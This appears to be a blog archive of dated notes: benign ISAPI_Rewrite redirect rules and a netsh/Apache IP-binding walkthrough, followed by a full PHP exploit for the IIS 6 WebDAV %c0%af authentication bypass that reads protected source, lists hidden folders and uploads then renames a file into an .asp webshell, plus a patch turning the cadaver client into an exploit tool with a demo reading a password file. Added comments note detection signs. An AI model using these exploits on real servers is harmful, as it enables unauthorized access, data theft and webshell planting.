Oct 09

1. Download ISAPI_Rewrite (see the reference in step 6)

2. Unzip iis_urlrewirte.zip into a directory of your choice (example: c:\rewrite)

3. Add the ISAPI filter to the site in question

4. Restart IIS

5. Rewrite rules
   5.1 Redirect domain.com to www.domain.com

# ISAPI_Rewrite 2.x 
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond Host: ^domain\.com$
RewriteRule (.*) http\://www\.domain\.com$1 [I,RP]

# ISAPI_Rewrite 3.0
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond %{HTTP:Host} ^domain\.com$
RewriteRule (.*) http\://www\.domain\.com$1 [NC,R=301]

   5.2 Redirect oldpage.html to newpage.html

# ISAPI_Rewrite 2.x
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteRule ^/oldpage.html$ http://domain.com/newpage.html [I,O,RP,L]

# ISAPI_Rewrite 3.0 
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteRule ^/oldpage.html$ http://domain.com/newpage.html [NC,L,R=301,O]

6. Reference

http://www.isapirewrite.com/

Sep 15

1) Add, or make sure your machine already has, two or more IP addresses
2) Open a command prompt
3) Type netsh
4) Type http
5) Type `show iplisten`. The list should be empty: an empty list means http.sys (and therefore IIS) listens on every address, which is why it currently holds 0.0.0.0:80
6) Type add iplisten ipaddress=192.168.0.90
You should get IP address successfully added
7) Type `show iplisten` again; 192.168.0.90 should now appear in the list
8) Type exit to get out of netsh
9) Type `netstat -an` and check that 192.168.0.90:80 appears in the list. If you still see 0.0.0.0:80, run iisreset so IIS picks up the new listen list
10) Download and install Apache ( I did it with 2.2.4)
http://mirror.nyi.net/apache/httpd/binaries/win32/apache_2.2.4-win32-x86…
11) Do a default install,
12) Open httpd.conf and adjust the ip listen to 192.168.0.91:80

# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the
# <VirtualHost> directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
#
#Listen 12.34.56.78:80
#Was 80
#Change to

Listen 192.168.0.91:80

12) Restart the Apache service. (The Services start/stop control didn't work for me; I used `net stop apache2` followed by `net start apache2`.)
13) Type netstat -an
14) You should see both 192.168.0.90:80 and 192.168.0.91:80. Open a browser and test both IPs to confirm that IIS7 and Apache each come up on their own address.
15) Test restarting Apache service to see if it works after that.
16) Turn off Apache and browse IIS; turn off IIS and browse Apache. Test every combination to confirm each server stays bound only to its own address.

May 22

<?
// NOTE(review): the quotation marks throughout this listing are typographic
// (“ ” ‘ ’), an artifact of how the blog rendered the paste; as shown it is not
// valid PHP. It is kept as a record of the technique, and the comments describe
// what each part does so that the traffic it produces can be recognised in logs.

// Usage banner. Three modes, chosen by argv[1]: "source" (a GET carrying a
// "Translate: f" header, which requests the raw file rather than the processed
// page), "path" (a PROPFIND directory listing) and "put" (PUT a text file, then
// MOVE it to an .asp name). All three rely on the same IIS 6 WebDAV request
// decoding flaw, triggered by the overlong UTF-8 sequence %c0%af in the path.
print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

// Argument checks: argv[1] must be one of the three mode keywords, argv[2] a
// bare host name (no "http://" scheme), argv[3] a path containing at least one "/".
// Each failure prints a message and stops the script.
//initial checks
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
// Writes one raw HTTP request and captures the whole response.
//   $sock  the complete request text (request line, headers and any body).
// Reads the global $host (target name, resolved with gethostbyname) and stores
// the raw response — status line and headers included — in the global $html.
// Opens a plain TCP connection to port 80; if that fails the script stops.
function sent($sock)  
{  
global  $host, $html;  
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
// Read until the server closes the connection ("Connection: close" is sent
// by every caller), accumulating the entire response.
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

// "source" mode: the last "/" in the path is replaced by "%c0%af/" (an overlong
// UTF-8 encoding of "/") and a GET with "Translate: f" is sent; the raw response
// is printed. From a defender's view, an IIS log entry whose URI contains %c0%af,
// or a GET carrying "Translate: f", is the observable signature of this technique.
if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
// "path" mode: "%c0%af" is inserted before the last "/" and a PROPFIND is
// issued; the response is split on "<a:href>" and the text up to the next "<"
// of each piece is printed, i.e. one entry per href in the collection listing.
// Detection note: PROPFIND against a collection that normally requires
// authentication, answered with 207 instead of 401, is the server-side symptom.
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
// "put" mode: reads test.txt from the current directory, PUTs it under the
// target collection (same "%c0%af" insertion), waits two seconds, then MOVEs it
// to racle.asp. The MOVE is the step that turns a text upload into server-side
// executable content. Mitigation: deny PUT/MOVE (or any write) of script
// extensions through WebDAV, and disable WebDAV where it is not needed.
// Detection: a PUT followed shortly by a MOVE whose Destination ends in .asp.
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
  // test.txt could not be opened: exit silently.
 else{die;}
 }

May 21

Blog post with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
